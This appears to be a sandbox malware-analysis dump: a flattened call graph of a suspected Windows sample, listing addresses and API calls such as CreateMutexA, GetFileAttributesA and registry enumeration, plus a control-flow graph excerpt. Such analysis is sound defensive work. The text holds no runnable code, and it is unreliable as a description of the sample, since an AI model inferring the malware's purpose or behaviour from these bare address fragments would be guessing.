38017 b96d00 CreateThread 38018 b96d20 Sleep 38017->38018 38019 b96c70 38017->38019 38018->38018 38020 b96ca0 38019->38020 38021 b97a00 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 38020->38021 38022 b85c10 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 38020->38022 38025 b947b0 38020->38025 38021->38020 38022->38020 38024 b96cec Sleep 38024->38020 38026 b947eb 38025->38026 38029 b94ee3 Concurrency::details::LockQueueNode::DerefTimerNode 38025->38029 38028 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38026->38028 38026->38029 38027 b94f59 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z Concurrency::details::LockQueueNode::DerefTimerNode 38027->38024 38030 b9480c 38028->38030 38029->38027 38031 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38029->38031 38032 b85c10 5 API calls 38030->38032 38033 b94fba 38031->38033 38034 b94813 38032->38034 38035 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38034->38035 38036 b94825 38035->38036 38037 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38036->38037 38038 b94837 38037->38038 38039 b8be30 11 API calls 38038->38039 38040 b94843 38039->38040 38041 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38040->38041 38042 b94858 38041->38042 38043 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38042->38043 38044 b94870 38043->38044 38045 b85c10 5 API calls 38044->38045 38046 b94877 38045->38046 38047 b88580 2 API calls 38046->38047 38048 b94883 38047->38048 38049 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38048->38049 38115 b94afd 38048->38115 38051 b9489f 38049->38051 38050 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38052 b94b2f 38050->38052 38053 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38051->38053 38054 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38052->38054 38055 b948b7 38053->38055 38056 b94b44 38054->38056 38057 b85c10 5 API calls 38055->38057 38058 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38056->38058 38059 b948be 38057->38059 38060 b94b56 38058->38060 38061 b88580 2 API calls 38059->38061 38062 b8be30 11 API calls 38060->38062 38064 b948ca 38061->38064 38063 b94b62 38062->38063 38065 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38063->38065 38066 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38064->38066 38064->38115 38067 b94b77 38065->38067 38068 b948e7 38066->38068 38069 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38067->38069 38070 b85c10 5 API calls 38068->38070 38071 b94b8f 38069->38071 38075 b948ef 38070->38075 38072 b85c10 5 API calls 38071->38072 38073 b94b96 38072->38073 38074 b88580 2 API calls 38073->38074 38076 b94ba2 38074->38076 38077 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38075->38077 38078 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38076->38078 38079 b94e70 Concurrency::details::LockQueueNode::DerefTimerNode 38076->38079 38084 b94959 Concurrency::details::LockQueueNode::DerefTimerNode 38077->38084 38080 b94bbe 38078->38080 38079->38029 38082 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38079->38082 38081 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38080->38081 38083 b94bd6 38081->38083 38082->38029 38086 b85c10 5 API calls 38083->38086 38085 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38084->38085 38087 b949e6 38085->38087 38088 b94bdd 38086->38088 38090 b85c10 5 API calls 38087->38090 38089 b88580 2 API calls 38088->38089 38091 b94be9 38089->38091 38094 b949ee 38090->38094 38091->38079 38092 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38091->38092 38093 b94c06 38092->38093 38096 b85c10 5 API calls 38093->38096 38095 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38094->38095 38098 b94a49 Concurrency::details::LockQueueNode::DerefTimerNode 38095->38098 38097 b94c0e 38096->38097 38099 b94c5a 38097->38099 38100 b94f97 38097->38100 38098->38115 38156 b898f0 38098->38156 38104 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38099->38104 38164 b98200 RtlAllocateHeap RtlAllocateHeap 38100->38164 38102 b94ad5 38106 bb75f6 __dosmaperr RtlAllocateHeap 38102->38106 38102->38115 38111 b94c78 Concurrency::details::LockQueueNode::DerefTimerNode 38104->38111 38105 b94f9c 38165 b9c1d9 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument CallUnexpected 38105->38165 38108 b94ade 38106->38108 38112 bb8ab6 4 API calls 38108->38112 38109 b94cec Concurrency::details::LockQueueNode::DerefTimerNode 38113 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38109->38113 38110 b94fa6 38114 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38110->38114 38111->38109 38111->38110 38112->38115 38116 b94d05 38113->38116 38117 b94fab 38114->38117 38115->38050 38115->38105 38119 b85c10 5 API calls 38116->38119 38118 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38117->38118 38118->38079 38120 b94d0d 38119->38120 38121 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38120->38121 38124 b94d68 Concurrency::details::LockQueueNode::DerefTimerNode 38121->38124 38122 b94ddc Concurrency::details::LockQueueNode::DerefTimerNode 38123 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38122->38123 38125 b94df7 38123->38125 38124->38117 38124->38122 38126 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38125->38126 38127 b94e0c 38126->38127 38128 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38127->38128 38129 b94e27 38128->38129 38130 b85c10 5 API calls 38129->38130 38131 b94e2e 38130->38131 38132 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38131->38132 38133 b94e67 38132->38133 38135 b94390 38133->38135 38136 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38135->38136 38137 b943d2 38136->38137 38138 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38137->38138 38139 b943e4 38138->38139 38140 b88580 2 API calls 38139->38140 38141 b943ed 38140->38141 38142 b94646 38141->38142 38154 b943f8 Concurrency::details::LockQueueNode::DerefTimerNode 38141->38154 38143 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38142->38143 38144 b94657 38143->38144 38145 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38144->38145 38147 b9466c 38145->38147 38146 b980c0 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 38146->38154 38148 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38147->38148 38150 b9467e 38148->38150 38149 b99280 2 API calls 38149->38154 38152 b93640 13 API calls 38150->38152 38151 b94610 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z Concurrency::details::LockQueueNode::DerefTimerNode 38151->38079 38152->38151 38153 b97a00 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 38153->38154 38154->38146 38154->38149 38154->38151 38154->38153 38166 b93640 38154->38166 38157 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38156->38157 38158 b8991e 38157->38158 38159 b85c10 5 API calls 38158->38159 38161 b89927 Mailbox 38159->38161 38160 b899c6 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z Concurrency::details::LockQueueNode::DerefTimerNode 38160->38102 38161->38160 38162 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38161->38162 38163 b899f2 38162->38163 38165->38110 38167 b9367f 38166->38167 38174 b93e6f Concurrency::details::LockQueueNode::DerefTimerNode 38166->38174 38168 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38167->38168 38169 b936b0 38168->38169 38170 b94327 38169->38170 38175 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38169->38175 38301 b98200 RtlAllocateHeap RtlAllocateHeap 38170->38301 38171 b94302 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z Concurrency::details::LockQueueNode::DerefTimerNode 38171->38154 38172 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38172->38174 38174->38171 38174->38172 38177 b936ff 38175->38177 38176 b9432c 38302 b98200 RtlAllocateHeap RtlAllocateHeap 38176->38302 38177->38170 38180 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38177->38180 38179 b94331 38182 b94336 38179->38182 38183 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38179->38183 38181 b93743 38180->38181 38181->38170 38184 b93765 38181->38184 38185 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38182->38185 38183->38182 38186 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38184->38186 38187 b9433b 38185->38187 38188 b93785 38186->38188 38303 b98200 RtlAllocateHeap RtlAllocateHeap 38187->38303 38190 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38188->38190 38192 b93798 38190->38192 38191 b94340 38193 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38191->38193 38194 b85c10 5 API calls 38192->38194 38195 b94345 38193->38195 38199 b937a3 38194->38199 38196 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38195->38196 38197 b9434a 38196->38197 38304 b9c199 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument CallUnexpected 38197->38304 38199->38176 38201 b937ef 38199->38201 38200 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38202 b94359 38200->38202 38203 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38201->38203 38305 b9c1d9 RtlAllocateHeap RtlAllocateHeap std::invalid_argument::invalid_argument CallUnexpected 38202->38305 38205 b93811 38203->38205 38205->38179 38206 b93845 Concurrency::details::LockQueueNode::DerefTimerNode 38205->38206 38207 b898f0 5 API calls 38206->38207 38208 b93872 38207->38208 38209 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38208->38209 38214 b93c79 Concurrency::details::LockQueueNode::DerefTimerNode 38208->38214 38210 b93889 38209->38210 38211 b85c10 5 API calls 38210->38211 38212 b93894 38211->38212 38213 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38212->38213 38216 b938dc Concurrency::details::LockQueueNode::DerefTimerNode 38213->38216 38214->38174 38214->38200 38215 b9397e Concurrency::details::LockQueueNode::DerefTimerNode 38215->38187 38218 b939bd 38215->38218 38265 b93b49 Concurrency::details::LockQueueNode::DerefTimerNode 38215->38265 38216->38182 38216->38215 38217 bb75f6 __dosmaperr RtlAllocateHeap 38220 b93b58 38217->38220 38219 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38218->38219 38221 b939da 38219->38221 38222 bb8ab6 4 API calls 38220->38222 38297 b8ad70 5 API calls 4 library calls 38221->38297 38224 b93b7a 38222->38224 38224->38197 38225 b93b89 38224->38225 38225->38202 38225->38214 38229 b93c8d 38225->38229 38230 b93ba2 38225->38230 38231 b93f42 38225->38231 38232 b93e74 38225->38232 38226 b93a77 Concurrency::details::LockQueueNode::DerefTimerNode 38227 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38226->38227 38233 b93a96 38227->38233 38228 b939e5 Concurrency::details::LockQueueNode::DerefTimerNode 38228->38191 38228->38226 38235 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38229->38235 38237 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38230->38237 38236 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38231->38236 38234 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38232->38234 38238 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38233->38238 38239 b93e9c 38234->38239 38240 b93cb5 38235->38240 38241 b93f56 38236->38241 38242 b93bca 38237->38242 38244 b93aa8 38238->38244 38245 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38239->38245 38246 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38240->38246 38247 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38241->38247 38243 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38242->38243 38248 b93be8 38243->38248 38298 b849a0 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::LockQueueNode::DerefTimerNode 38244->38298 38250 b93eba 38245->38250 38251 b93cd3 38246->38251 38252 b93f6e 38247->38252 38253 b85c10 5 API calls 38248->38253 38254 b85c10 5 API calls 38250->38254 38255 b85c10 5 API calls 38251->38255 38256 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38252->38256 38257 b93bef 38253->38257 38258 b93ec1 38254->38258 38259 b93cda 38255->38259 38260 b93f86 38256->38260 38261 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38257->38261 38262 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38258->38262 38263 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38259->38263 38264 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38260->38264 38266 b93c07 38261->38266 38267 b93ed9 38262->38267 38268 b93cef 38263->38268 38269 b93f98 38264->38269 38265->38217 38270 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38266->38270 38271 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38267->38271 38273 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38268->38273 38300 b92f10 13 API calls 4 library calls 38269->38300 38275 b93c1f 38270->38275 38276 b93ef1 38271->38276 38272 b93ab7 Concurrency::details::LockQueueNode::DerefTimerNode 38272->38195 38272->38265 38277 b93d07 38273->38277 38278 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38275->38278 38279 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38276->38279 38280 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38277->38280 38281 b93c37 38278->38281 38282 b93f09 38279->38282 38283 b93d1f 38280->38283 38285 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38281->38285 38286 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38282->38286 38284 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38283->38284 38288 b93d37 38284->38288 38289 b93c4f 38285->38289 38287 b93f21 38286->38287 38290 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38287->38290 38291 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38288->38291 38292 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38289->38292 38294 b93c67 38290->38294 38293 b93d49 38291->38293 38292->38294 38299 b91ec0 13 API calls 4 library calls 38293->38299 38296 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38294->38296 38296->38214 38297->38228 38298->38272 38299->38214 38300->38214 38305->38174 38306 b8a682 GetFileAttributesA 38308 b8a692 Concurrency::details::LockQueueNode::DerefTimerNode 38306->38308 38307 b8a949 38310 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38307->38310 38308->38307 38309 b8a75d Concurrency::details::LockQueueNode::DerefTimerNode 38308->38309 38312 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38309->38312 38311 b8a94e 38310->38311 38313 b8a953 Sleep CreateMutexA 38311->38313 38314 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38311->38314 38315 b8a903 38312->38315 38318 b8a98e 38313->38318 38314->38313 38317 b8a9a7 38318->38317 38321 bb6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 38318->38321 38320 b8a9b0 38321->38320 38336 b9d762 38337 b9d76e __FrameHandler3::FrameUnwindToState 38336->38337 38357 b9d488 38337->38357 38339 b9d8ce ___scrt_fastfail 38378 bb6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 38339->38378 38341 b9d8db 38379 bb65ed GetPEB GetPEB RtlAllocateHeap CallUnexpected 38341->38379 38343 b9d8e3 ___security_init_cookie 38345 b9d8e9 __scrt_common_main_seh 38343->38345 38344 b9d7be 38346 b9d83f 38361 bb95bc 38346->38361 38348 b9d775 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 38348->38339 38348->38344 38348->38346 38377 bb6603 3 API calls 3 library calls 38348->38377 38350 b9d845 38365 b96d30 38350->38365 38358 b9d491 38357->38358 38360 b9d4a6 ___scrt_uninitialize_crt 38358->38360 38380 bb9a28 38358->38380 38360->38348 38362 bb95ca 38361->38362 38363 bb95c5 38361->38363 38362->38350 38404 bb9320 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 38363->38404 38405 b8a960 Sleep CreateMutexA 38365->38405 38369 b96d45 38370 b8d6d0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 38369->38370 38371 b96d4a 38370->38371 38372 b94fc0 7 API calls 38371->38372 38373 b96d4f 38372->38373 38374 b86020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap RtlAllocateHeap 38373->38374 38375 b96d54 38374->38375 38376 b86020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap RtlAllocateHeap 38375->38376 38376->38375 38377->38346 38378->38341 38379->38343 38383 bbee7e 38380->38383 38384 bbee8e 38383->38384 38385 bb9a37 38383->38385 38384->38385 38387 bbc54b 38384->38387 38385->38360 38388 bbc557 __FrameHandler3::FrameUnwindToState CallUnexpected 38387->38388 38393 bbbdc4 38388->38393 38390 bbc56d 38392 bbc577 38390->38392 38402 bbc3e1 RtlAllocateHeap 38390->38402 38392->38384 38394 bbbdd0 __FrameHandler3::FrameUnwindToState 38393->38394 38395 bbbdd9 38394->38395 38401 bbbdfa CallUnexpected 38394->38401 38396 bb75f6 __dosmaperr RtlAllocateHeap 38395->38396 38397 bbbdde 38396->38397 38403 bb6c5a RtlAllocateHeap ___std_exception_copy 38397->38403 38399 bbbde8 38399->38390 38400 bbbd14 __wsopen_s RtlAllocateHeap 38400->38401 38401->38399 38401->38400 38402->38392 38403->38399 38404->38362 38407 b8a98e 38405->38407 38406 b8a9a7 38410 b8ce40 38406->38410 38407->38406 38415 bb6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 38407->38415 38409 b8a9b0 38411 b97a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38410->38411 38412 b8ce92 38411->38412 38413 b85c10 5 API calls 38412->38413 38414 b8ce9d 38413->38414 38415->38409 38430 b89ba5 GetFileAttributesA 38431 b89bb5 Concurrency::details::LockQueueNode::DerefTimerNode 38430->38431 38432 b8a91c 38431->38432 38435 b89c80 Concurrency::details::LockQueueNode::DerefTimerNode 38431->38435 38433 b8a953 Sleep CreateMutexA 38432->38433 38434 bb6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38432->38434 38440 b8a98e 38433->38440 38434->38433 38437 b980c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38435->38437 38438 b8a903 38437->38438 38439 b8a9a7 38440->38439 38443 bb6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 38440->38443 38442 b8a9b0 38443->38442 38444 bbc1c4 38445 bbc367 38444->38445 38447 bbc1ee 38444->38447 38446 bb75f6 __dosmaperr RtlAllocateHeap 38445->38446 38453 bbc352 ___std_exception_copy __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 38446->38453 38447->38445 38448 bbc239 38447->38448 38459 bc292b 38448->38459 38450 bbc259 38463 bc2139 38450->38463 38452 bbc26d 38452->38453 38470 bc2165 38452->38470 38455 bbc27f 38455->38453 38477 bc2191 38455->38477 38457 bbc291 38457->38453 38484 bc2988 RtlAllocateHeap __FrameHandler3::FrameUnwindToState CallUnexpected 38457->38484 38460 bc2937 __FrameHandler3::FrameUnwindToState CallUnexpected 38459->38460 38461 bc295c 38460->38461 38485 bc284d 38460->38485 38461->38450 38464 bc215a 38463->38464 38465 bc2145 38463->38465 38464->38452 38466 bb75f6 __dosmaperr RtlAllocateHeap 38465->38466 38467 bc214a 38466->38467 38594 bb6c5a RtlAllocateHeap ___std_exception_copy 38467->38594 38469 bc2155 38469->38452 38471 bc2186 38470->38471 38472 bc2171 38470->38472 38471->38455 38473 bb75f6 __dosmaperr RtlAllocateHeap 38472->38473 38474 bc2176 38473->38474 38595 bb6c5a RtlAllocateHeap ___std_exception_copy 38474->38595 38476 bc2181 38476->38455 38478 bc219d 38477->38478 38479 bc21b2 38477->38479 38480 bb75f6 __dosmaperr RtlAllocateHeap 38478->38480 38479->38457 38481 bc21a2 38480->38481 38596 bb6c5a RtlAllocateHeap ___std_exception_copy 38481->38596 38483 bc21ad 38483->38457 38484->38453 38487 bc2899 38485->38487 38486 bc28a0 38489 bc2910 38486->38489 38490 bc2907 38486->38490 38487->38486 38582 bbb04b RtlAllocateHeap RtlAllocateHeap ListArray __dosmaperr _unexpected 38487->38582 38491 bc290d 38489->38491 38553 bc26f2 38489->38553 38501 bc2517 38490->38501 38494 bbadf5 ___free_lconv_mon RtlAllocateHeap 38491->38494 38496 bc291b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 38494->38496 38495 bc28b8 38498 bc28e5 38495->38498 38499 bc28bf 38495->38499 38496->38461 38497 bbadf5 ___free_lconv_mon RtlAllocateHeap 38497->38486 38500 bbadf5 ___free_lconv_mon RtlAllocateHeap 38498->38500 38499->38497 38500->38486 38502 bc2526 38501->38502 38503 bc2191 RtlAllocateHeap 38502->38503 38504 bc253c 38503->38504 38505 bc2139 RtlAllocateHeap 38504->38505 38507 bc26c1 ___std_exception_copy 38504->38507 38506 bc254e 38505->38506 38506->38507 38508 bbadf5 ___free_lconv_mon RtlAllocateHeap 38506->38508 38512 bc26c8 38506->38512 38509 bc2191 RtlAllocateHeap 38507->38509 38507->38512 38510 bc259e 38508->38510 38511 bc2717 38509->38511 38583 bbb04b RtlAllocateHeap RtlAllocateHeap ListArray __dosmaperr _unexpected 38510->38583 38513 bc2139 RtlAllocateHeap 38511->38513 38520 bc2842 ___std_exception_copy 38511->38520 38512->38491 38515 bc2729 38513->38515 38518 bc2165 RtlAllocateHeap 38515->38518 38515->38520 38516 bc25b6 38517 bbadf5 ___free_lconv_mon RtlAllocateHeap 38516->38517 38522 bc25c2 38517->38522 38519 bc273b 38518->38519 38519->38520 38521 bc2744 38519->38521 38540 bc28a0 38520->38540 38591 bbb04b RtlAllocateHeap RtlAllocateHeap ListArray __dosmaperr _unexpected 38520->38591 38523 bbadf5 ___free_lconv_mon RtlAllocateHeap 38521->38523 38522->38512 38584 bba1f1 RtlAllocateHeap __dosmaperr ___std_exception_copy 38522->38584 38524 bc274f GetTimeZoneInformation 38523->38524 38537 bc276b 38524->38537 38547 bc27be __cftof 38524->38547 38526 bc2910 38530 bc290d 38526->38530 38531 bc26f2 5 API calls 38526->38531 38528 bc2907 38533 bc2517 5 API calls 38528->38533 38529 bc25ec 38529->38507 38585 bc4a64 RtlAllocateHeap __dosmaperr ___std_exception_copy 38529->38585 38534 bbadf5 ___free_lconv_mon RtlAllocateHeap 38530->38534 38531->38530 38532 bc28bf 38538 bbadf5 ___free_lconv_mon RtlAllocateHeap 38532->38538 38533->38530 38536 bc291b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 38534->38536 38536->38491 38590 bbef17 GetPEB GetPEB RtlAllocateHeap _unexpected __fassign 38537->38590 38538->38540 38539 bc28b8 38539->38532 38542 bc28e5 38539->38542 38540->38526 38540->38528 38543 bbadf5 ___free_lconv_mon RtlAllocateHeap 38542->38543 38543->38540 38544 bc2605 38544->38507 38586 bb8bbe GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 38544->38586 38546 bc262a 38548 bc2680 38546->38548 38587 bb8bbe GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 38546->38587 38547->38491 38548->38512 38589 bc4a64 RtlAllocateHeap __dosmaperr ___std_exception_copy 38548->38589 38550 bc2651 38550->38548 38588 bb8bbe GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 38550->38588 38554 bc2701 38553->38554 38555 bc2191 RtlAllocateHeap 38554->38555 38556 bc2717 38555->38556 38557 bc2139 RtlAllocateHeap 38556->38557 38562 bc2842 ___std_exception_copy 38556->38562 38558 bc2729 38557->38558 38559 bc2165 RtlAllocateHeap 38558->38559 38558->38562 38560 bc273b 38559->38560 38561 bc2744 38560->38561 38560->38562 38563 bbadf5 ___free_lconv_mon RtlAllocateHeap 38561->38563 38577 bc28a0 38562->38577 38593 bbb04b RtlAllocateHeap RtlAllocateHeap ListArray __dosmaperr _unexpected 38562->38593 38564 bc274f GetTimeZoneInformation 38563->38564 38574 bc276b 38564->38574 38581 bc27be __cftof 38564->38581 38566 bc2910 38568 bc290d 38566->38568 38569 bc26f2 5 API calls 38566->38569 38567 bc2907 38571 bc2517 5 API calls 38567->38571 38572 bbadf5 ___free_lconv_mon RtlAllocateHeap 38568->38572 38569->38568 38570 bc28bf 38575 bbadf5 ___free_lconv_mon RtlAllocateHeap 38570->38575 38571->38568 38573 bc291b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 38572->38573 38573->38491 38592 bbef17 GetPEB GetPEB RtlAllocateHeap _unexpected __fassign 38574->38592 38575->38577 38576 bc28b8 38576->38570 38579 bc28e5 38576->38579 38577->38566 38577->38567 38580 bbadf5 ___free_lconv_mon RtlAllocateHeap 38579->38580 38580->38577 38581->38491 38582->38495 38583->38516 38584->38529 38585->38544 38586->38546 38587->38550 38588->38548 38589->38507 38590->38547 38591->38539 38592->38581 38593->38576 38594->38469 38595->38476 38596->38483

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 438 b8e530-b8e843 call b97a00 call b85c10 call b97a00 call b85c10 call b99280 call b98320 call b98220 call b98320 call b97a00 * 3 call b8be30 call b97a00 * 2 call b85c10 call b88580 476 b8ea1a-b8ea62 438->476 477 b8e8ce-b8e9ec 438->477 476->477 481 b8ea8f-b8ea96 call b9d663 476->481 486 b8ea99-b8eab2 call b9cff1 477->486 487 b8e9f2-b8e9fe 477->487 481->486 487->481 488 b8ea04-b8ea12 487->488 488->476 490 b8eab8-b8eda3 call bb6c6a * 2 call b97a00 call b85c10 call b983c0 call b98220 GetFileAttributesA call b97a00 call b85c10 call b983c0 call b98220 GetFileAttributesA 488->490 521 b8eda9-b8ee79 490->521 526 b8f5bb-b8f66c call b980c0 521->526 527 b8f273-b8f28b 521->527 526->527 531 b8f699-b8f6a0 call b9d663 526->531 528 b8f291-b8f29d 527->528 529 b8f6a3-b8f6b6 527->529 528->531 532 b8f2a3-b8f2b1 528->532 531->529 532->526 534 b8f6cb-b8f962 call bb6c6a call b97a00 call b85c10 call b97a00 * 4 call b8e530 call b980c0 call b97a00 call b980c0 * 2 532->534 570 b8f98c-b8f9a5 call b9cff1 534->570 571 b8f964-b8f970 534->571 572 b8f982-b8f989 call b9d663 571->572 573 b8f972-b8f980 571->573 572->570 573->572 575 b8f9ab-b8fb15 call bb6c6a call b97a00 call b85c10 call b97a00 * 4 call b8e530 573->575 600 b8fb3f-b8fb4e 575->600 601 b8fb17-b8fb23 575->601 602 b8fb35-b8fb3c call b9d663 601->602 603 b8fb25-b8fb33 601->603 602->600 603->602 604 b8fb4f-b8fc6f call bb6c6a call b97a00 call b89580 call b89230 call b98320 603->604 620 b8fc70-b8fc75 604->620 620->620 621 b8fc77-b90860 call b980c0 call b97a00 * 2 call b8c360 call bb6729 call b97a00 call b85c10 call b97a00 * 4 call b8e530 620->621 656 b9088a-b908a5 call b9cff1 621->656 657 b90862-b9086e 621->657 658 b90880-b90887 call b9d663 657->658 659 b90870-b9087e 657->659 658->656 659->658 661 b908ce-b915f2 call bb6c6a call b97a00 call b85c10 call b97a00 * 4 call b8e530 659->661
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
